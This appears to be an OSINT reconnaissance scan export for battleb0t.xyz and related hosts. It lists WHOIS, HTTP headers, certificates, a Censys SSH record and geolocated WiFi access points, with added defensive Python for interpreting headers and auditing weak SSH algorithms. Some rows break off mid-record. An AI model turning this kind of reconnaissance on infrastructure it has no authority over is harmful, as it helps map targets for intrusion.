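SCAN_TIME = datetime(2023, 5, 12, 2, 59, 45, tzinfo=timezone.utc)

MULTI = {"Domain Status", "Name Server"}  # keys that legitimately repeat


def parse_whois(text):
    """Key/value parse; repeated keys become lists, empty values are dropped."""
    rec = defaultdict(list)
    for line in text.splitlines():
        if ":" not in line or line.startswith(">>>"):
            continue
        key, _, value = line.partition(":")  # first colon only: values may hold URLs
        key, value = key.strip(), value.strip()
        if value:
            rec[key].append(value)
    return {k: v if k in MULTI else v[0] for k, v in rec.items()}


def parse_date(s):
    # Registry writes "2024-03-31T23:59:59.0Z", the registrar "2024-03-31T23:59:59Z".
    s = s.rstrip("Z").split(".")[0]
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)


def expiry(rec):
    """Thin and thick output name the expiry field differently; accept both."""
    for key in ("Registry Expiry Date", "Registrar Registration Expiration Date"):
        if key in rec:
            return parse_date(rec[key])
    return None


def summarise(registry_text, registrar_text, now=SCAN_TIME):
    reg, rar = parse_whois(registry_text), parse_whois(registrar_text)
    created = parse_date(reg["Creation Date"])
    age_days = (now.date() - created.date()).days  # whole calendar days at scan time
    ns_registry = {n.lower() for n in reg.get("Name Server", [])}
    ns_registrar = {n.lower() for n in rar.get("Name Server", [])}
    statuses = {s.split()[0].lower() for s in reg.get("Domain Status", []) + rar.get("Domain Status", [])}
    return {
        "domain": reg["Domain Name"].lower(),
        "created": created,
        "age_days": age_days,
        # Assumed buckets: young registrations are a common phishing/C2 indicator.
        "age_bucket": "new" if age_days < 180 else "recent" if age_days < 730 else "established",
        "expires": expiry(rar) or expiry(reg),
        "nameservers": sorted(ns_registry),
        "nameservers_agree": ns_registry == ns_registrar,
        "updated_dates_agree": parse_date(reg["Updated Date"]) == parse_date(rar["Updated Date"]),
        "transfer_locked": "clienttransferprohibited" in statuses,
        "dnssec": reg.get("DNSSEC", "").lower() == "signeddelegation",
        "redacted_fields": sorted(k for k, v in rar.items() if v == "DATA REDACTED"),
    }


if __name__ == "__main__":
    for k, v in summarise(REGISTRY, REGISTRAR).items():
        print(f"{k}: {v}")
```

For tayhu.xyz this gives a 407-day-old, transfer-locked, unsigned domain on Cloudflare nameservers with every contact redacted behind the registrar's web form; the `Updated Date` mismatch is the registry and registrar reporting their own last change, which is why the summary records both sources rather than picking one.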
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f8c5eeb1a42bf-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
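Both "Non-Standard HTTP Header" rows above carry the same kind of header set: `server: cloudflare`, a `cf-ray`, and `cf-mitigated: challenge`. That last header means the scanner was served Cloudflare's managed-challenge page, so the security headers in those rows (`referrer-policy`, `permissions-policy`, the cross-origin isolation headers) describe the challenge page, not the origin site. The Python below is an added example, not SpiderFoot code: it takes one of those header dictionaries (copied from the row, with `permissions-policy` shortened) and separates the two questions an analyst needs answered, whether the origin was reached at all and which recommended security headers are present or missing; the list of expected headers is an assumed baseline.

```python
"""Interpret a scanned HTTP response header set before treating it as evidence.

Added example (not SpiderFoot's code). SAMPLE_HEADERS is copied from the
"Non-Standard HTTP Header" row above (permissions-policy abbreviated);
EXPECTED_SECURITY_HEADERS is an assumed hardening baseline.
"""
import json

SAMPLE_HEADERS = {
    "content-encoding": "gzip",
    "nel": '{"success_fraction":0,"report_to":"cf-nel","max_age":604800}',
    "referrer-policy": "same-origin",
    "permissions-policy": "accelerometer=(),autoplay=(),camera=(),geolocation=(),microphone=(),usb=()",
    "cross-origin-resource-policy": "same-origin",
    "alt-svc": 'h3=":443"; ma=86400, h3-29=":443"; ma=86400',
    "server": "cloudflare",
    "cf-mitigated": "challenge",
    "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate",
    "x-frame-options": "SAMEORIGIN",
    "cross-origin-embedder-policy": "require-corp",
    "content-type": "text/html; charset=UTF-8",
    "cf-ray": "7c5f8c5eeb1a42bf-EWR",
    "cross-origin-opener-policy": "same-origin",
}

# Headers a hardened HTML response is normally expected to carry (assumed baseline).
EXPECTED_SECURITY_HEADERS = (
    "strict-transport-security",
    "content-security-policy",
    "x-content-type-options",
    "x-frame-options",
    "referrer-policy",
    "permissions-policy",
    "cross-origin-opener-policy",
    "cross-origin-embedder-policy",
    "cross-origin-resource-policy",
)


def normalise(headers):
    """Lower-case header names; the scan rows already do, raw captures may not."""
    return {k.lower(): v for k, v in headers.items()}


def is_edge_challenge(headers):
    """True when Cloudflare answered with its managed challenge instead of the origin.

    cf-mitigated: challenge is set on the interstitial Cloudflare serves when its
    bot management did not let the request through, so nothing in the response
    (headers or body) came from the target's own server.
    """
    h = normalise(headers)
    return h.get("server", "").lower() == "cloudflare" and h.get("cf-mitigated", "").lower() == "challenge"


def cf_colo(headers):
    """Data-centre code from cf-ray, e.g. '7c5f8c5eeb1a42bf-EWR' -> 'EWR'."""
    ray = normalise(headers).get("cf-ray", "")
    return ray.rsplit("-", 1)[1] if "-" in ray else None


def security_header_report(headers):
    """Return (present, missing) against the expected baseline, in baseline order."""
    h = normalise(headers)
    present = [n for n in EXPECTED_SECURITY_HEADERS if n in h]
    missing = [n for n in EXPECTED_SECURITY_HEADERS if n not in h]
    return present, missing


def assess(headers):
    """Summarise what the header set does and does not tell you about the target."""
    present, missing = security_header_report(headers)
    challenge = is_edge_challenge(headers)
    return {
        "edge_challenge": challenge,
        "colo": cf_colo(headers),
        "present": present,
        "missing": missing,
        # Only record the inventory as the origin's posture when the edge did
        # not substitute its own page for the target's response.
        "origin_posture_observable": not challenge,
    }


if __name__ == "__main__":
    print(json.dumps(assess(SAMPLE_HEADERS), indent=2))
```

On the row's headers the report shows HSTS, CSP and `x-content-type-options` missing and six headers present, but `origin_posture_observable` is false: all of it belongs to the challenge page served from Cloudflare's EWR site, and the target has to be re-requested in a way that passes the challenge before any of those findings can be attributed to it.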
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6562 7451 (Net ID: 00:00:C5:D7:2F:EC) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:15 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'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', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'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', 
u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'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', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | U+ACN (Net ID: 00:02:A8:81:E3:26) | 50.1188, 8.6843 |
| 2023-05-12 03:04:07 | Malicious IP on Same Subnet | Yes | Greensnow | 0 | 0 | 4 | 0 | None | greensnow.co [165.232.112.0/20]
https://blocklist.greensnow.co/greensnow.txt | 165.232.112.0/20 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c5e4216390f2caf-ORD"]} | 188.114.96.1 |
| 2023-05-12 02:54:14 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html | kekw.battleb0t.xyz |
| 2023-05-12 02:52:31 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4e:82:1a:86:ae:7d:8a:39:3c:25:24:c6:46:df:b3:a2:f4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 03:43:01 2023 GMT
Not After : Jul 23 03:43:00 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:dc:59:e7:99:ae:31:e4:ce:62:3e:34:b7:81:78:
80:f6:cd:df:74:9e:4d:b0:70:b7:b4:57:2f:17:e3:
3f:ff:b7:70:ed:8a:df:e6:f8:7a:13:c3:bd:36:4f:
0e:6a:68:6d:9d:a6:4b:2a:e9:cf:28:3d:81:ea:ca:
83:e7:16:86:77:3d:14:db:66:a8:57:ad:1a:0f:dd:
bd:7a:de:42:3b:37:3e:1c:ee:7d:2e:c6:c7:59:4e:
97:c9:0c:71:fa:0f:cd:7b:53:70:a6:5f:75:ef:13:
69:99:fc:c4:53:c7:8e:d0:09:93:90:8c:53:db:39:
20:10:21:64:71:0b:d6:b1:4c:65:ce:12:f1:57:52:
01:6a:62:40:bf:50:e1:af:0a:5c:4b:64:2c:31:51:
3e:93:5a:d7:3f:02:ea:a6:3c:b6:44:a0:a2:88:9a:
29:5e:d3:7c:e0:73:af:03:2d:32:ad:0b:a7:f4:f0:
67:e5:fc:86:ba:7a:2e:9a:6b:e7:a5:c3:0e:1d:6b:
4d:99:e3:e1:77:10:a6:f7:fe:e7:5d:ea:9a:d7:11:
bf:a0:de:50:ee:ee:9e:57:01:39:6f:73:ca:e6:06:
09:03:5a:1d:77:7b:8a:3f:fa:c2:82:ef:9a:8b:50:
68:73:cc:01:67:44:99:3d:d1:99:16:93:ec:e9:25:
6b:ff
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:07:25:ED:0B:E1:FD:78:EA:13:86:BD:62:79:CF:21:9B:25:7F:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
6e:83:25:66:25:1a:3d:8f:56:ff:c6:08:d8:7f:3e:06:71:b1:
38:70:e3:fc:72:2a:2d:17:39:ae:84:7f:28:90:6f:b9:3a:53:
70:c6:b9:f9:5c:8e:b6:f6:c9:24:b6:77:0f:70:91:82:5f:ac:
56:6c:08:4c:23:f5:3c:83:00:83:99:51:65:02:cf:77:c0:85:
ba:ab:a0:9d:95:f2:a4:6b:60:04:68:4d:ab:64:a5:39:13:18:
4b:22:b6:3e:90:a8:e1:cb:6c:80:ed:eb:e8:db:09:6d:7d:c5:
d7:7c:4e:0f:11:9f:9c:8c:8f:a2:2c:66:4c:ea:1f:42:07:c6:
45:55:f4:95:f7:e4:07:4c:aa:76:9c:20:37:d5:34:08:5d:ee:
e2:cf:d2:d6:c0:28:79:06:9f:80:f2:b4:81:17:70:24:de:d7:
df:3a:1c:d8:39:dc:4e:be:14:64:a2:ac:e4:0d:fd:e2:26:1c:
5b:a9:79:86:45:3c:74:3c:8d:5c:cc:03:b8:49:29:86:da:6b:
96:13:a0:71:5d:33:3b:08:b4:30:d2:63:d3:44:80:84:2e:62:
2f:23:c8:e2:cd:24:db:22:f1:8a:aa:49:97:34:12:ee:76:9f:
d2:2b:73:15:a1:ca:90:11:c4:27:df:87:b0:88:a3:ea:c8:db:
d6:03:72:a5
| battleb0t.xyz |
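The Censys record for kekw.battleb0t.xyz that follows carries the SSH server's full KEXINIT offer for 165.232.113.85 (`SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1`). Two things in it deserve a check rather than a glance: the MAC list still offers `hmac-sha1`, `hmac-sha1-etm@openssh.com` and the 64-bit `umac-64` variants, and the `algorithm_selection` block shows what Censys' own client negotiated (`aes128-ctr`, `hmac-sha2-256`), which says nothing about what a weaker client would get. (The record's transport-layer fingerprint also guesses `CentOS` while the banner and CPE say Ubuntu; the banner is the better source.) The Python below is an added example, not SpiderFoot's or Censys' code: it audits the offer against an assumed baseline, shows the RFC 4253 negotiation rule that lets a legacy client pick the weak MAC, and emits the corrected `sshd_config` lines. The algorithm lists are copied from the record; the `WEAK` table is the assumption.

```python
"""Audit an SSH server's advertised algorithm offer (KEXINIT) for weak choices.

Added example, not SpiderFoot's or Censys' code. OFFER is copied from the
Censys record for 165.232.113.85 (OpenSSH_8.9p1 Ubuntu); the WEAK table is
an assumed hardening baseline, not a standard.
"""

OFFER = {
    "kex_algorithms": [
        "curve25519-sha256", "curve25519-sha256@libssh.org",
        "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521",
        "sntrup761x25519-sha512@openssh.com",
        "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512",
        "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256",
    ],
    "host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"],
    "ciphers": [
        "chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr",
        "aes128-gcm@openssh.com", "aes256-gcm@openssh.com",
    ],
    "macs": [
        "umac-64-etm@openssh.com", "umac-128-etm@openssh.com",
        "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com",
        "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com",
        "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1",
    ],
}

# Assumed policy: algorithm -> why it is flagged.
WEAK = {
    "diffie-hellman-group1-sha1": "1024-bit MODP group, SHA-1",
    "diffie-hellman-group14-sha1": "SHA-1 key exchange",
    "diffie-hellman-group-exchange-sha1": "SHA-1 key exchange",
    "ssh-rsa": "RSA signatures over SHA-1",
    "ssh-dss": "1024-bit DSA",
    "3des-cbc": "64-bit block cipher, CBC",
    "aes128-cbc": "CBC mode", "aes192-cbc": "CBC mode", "aes256-cbc": "CBC mode",
    "blowfish-cbc": "64-bit block cipher, CBC", "cast128-cbc": "64-bit block cipher, CBC",
    "arcfour": "RC4", "arcfour128": "RC4", "arcfour256": "RC4",
    "hmac-md5": "MD5", "hmac-md5-96": "MD5, truncated tag",
    "hmac-sha1": "SHA-1", "hmac-sha1-96": "SHA-1, truncated tag",
    "hmac-sha1-etm@openssh.com": "SHA-1",
    "umac-64@openssh.com": "64-bit tag", "umac-64-etm@openssh.com": "64-bit tag",
}

DIRECTIVE = {  # offer category -> sshd_config keyword
    "kex_algorithms": "KexAlgorithms",
    "host_key_algorithms": "HostKeyAlgorithms",
    "ciphers": "Ciphers",
    "macs": "MACs",
}


def audit(offer, weak=WEAK):
    """Return {category: [(algorithm, reason), ...]} for every flagged algorithm."""
    findings = {}
    for category, algs in offer.items():
        hits = [(a, weak[a]) for a in algs if a in weak]
        if hits:
            findings[category] = hits
    return findings


def preferred(offer):
    """The server's own first choice per category (sshd lists in configured order)."""
    return {c: algs[0] for c, algs in offer.items() if algs}


def negotiate(client_list, server_list):
    """RFC 4253 section 7.1: the first algorithm on the client's list that the
    server also offers wins. A legacy client that lists hmac-sha1 first still
    gets it here, whatever the scanner's own algorithm_selection shows."""
    for alg in client_list:
        if alg in server_list:
            return alg
    return None


def sshd_config_lines(offer, weak=WEAK):
    """Corrected configuration: the same offer with every flagged algorithm removed."""
    return {
        DIRECTIVE[c]: DIRECTIVE[c] + " " + ",".join(a for a in algs if a not in weak)
        for c, algs in offer.items() if c in DIRECTIVE
    }


if __name__ == "__main__":
    for category, hits in audit(OFFER).items():
        for alg, why in hits:
            print(f"{category}: {alg} ({why})")
    for line in sshd_config_lines(OFFER).values():
        print(line)
```

Only the MAC list is flagged for this host; key exchange, host keys and ciphers are modern. The `MACs` line the script prints is the drop-in fix, and the `negotiate` function is the argument for applying it: the server's order does not protect a client whose own preference list starts with SHA-1.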
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | kekw.battleb0t.xyz | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": 
"65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", 
"diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not 
Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": 